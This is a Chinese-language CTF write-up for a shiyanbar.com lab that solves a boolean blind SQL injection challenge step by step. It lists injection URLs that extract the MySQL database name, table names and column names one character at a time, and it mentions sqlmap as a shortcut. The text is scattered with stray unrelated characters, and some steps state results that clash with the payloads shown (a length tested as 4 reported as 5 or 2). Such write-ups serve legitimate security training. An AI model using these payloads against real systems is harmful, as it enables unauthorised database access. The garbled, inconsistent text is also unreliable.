時間:2017.9.29
題目鏈接:www.shiyanbar.com/ctf/1909
解題思路:類型為 bool 型的盲注抡柿,數(shù)據(jù)庫為MySQL
1) http://ctf5.shiyanbar.com/web/index_3.php?id=1 and 1=1? ?/? ? 1=2? ? ? ?沒有變化
? ? ? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and '1'='1? ?/? ? '1'='2? ?有變化
得出結(jié)論:這是關(guān)于bool的盲注
2) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())>0,這語句老是報錯,我知道是單引號沒閉合患膛,但是不知道該怎么寫,后來就用sqlmap跑了一下,知道了正確的寫法應(yīng)該是這樣寫的连茧,得出當(dāng)前數(shù)據(jù)庫長度為4
?http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())=4 and '1'='1??
3) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),1,1))=119? and '1'='1? ——? w? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),2,1))=101? and '1'='1? ? ? ? ——? e http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),3,1))=119? and '1'='1? ? ? ? ——? b http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),4,1))=49 and '1'='1? ? ? ? ? ?——? 1? 得出數(shù)據(jù)庫名為 web1
4) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2? and '1'='1? ——? 得出web1數(shù)據(jù)庫中有2張表
5) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4? and '1'='1 ——第1張表名長為 4? ? ? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4? and '1'='1 —— 第2張表名長為5
6) 先猜第1張表名
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102? and '1'='1? ——? f http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108? and '1'='1? ——? l http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97? and '1'='1? ——? a? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103? and '1'='1? ——? g
7) 然后猜解flag表中字段數(shù)
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')=2? and '1'='1? ——? flag 表中只有2個字段
8) 猜解flag 表中2個字段長度
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=4? and '1'='1? ——? 第1個字段長4? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4? and '1'='1? ——? 第二個字段長2
9) 猜解flag 表中2個字段名稱
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102? and '1'='1? ——? f? http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108? and '1'='1? ——? l
以此類推
10) 猜解數(shù)據(jù)
都是這樣的步驟鬓长,手工注入好繁瑣啊谒拴,可以直接用sqlmap,比較快
